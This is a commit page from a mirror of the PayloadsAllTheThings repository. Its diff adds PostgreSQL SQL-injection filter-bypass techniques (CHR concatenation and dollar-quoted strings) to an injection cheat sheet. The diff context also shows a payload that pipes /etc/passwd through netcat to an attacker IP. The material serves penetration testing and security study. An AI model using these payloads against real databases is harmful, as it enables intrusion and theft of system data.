ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

contribute PostgreSQL bypass quotes technique

Browse Source
This commit is contained in:
hloverflow 2020-07-12 13:14:26 +08:00
parent 982ac3968c
commit baadc6d3e9
1 changed files with 20 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
SQL Injection/PostgreSQL Injection.md
View File

@ -203,6 +203,25 @@ CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
```
### Bypass Filter
#### Quotes
Using CHR
```sql
SELECT CHR(65)||CHR(66)||CHR(67);
```
Using Dollar-signs ( >= version 8 PostgreSQL)
```sql
SELECT $$This is a string$$
SELECT $TAG$This is another string$TAG$
```
## References
* [A Penetration Testers Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
@ -210,3 +229,4 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)
* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
* [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli)
* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - 2019 - INFIGO](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)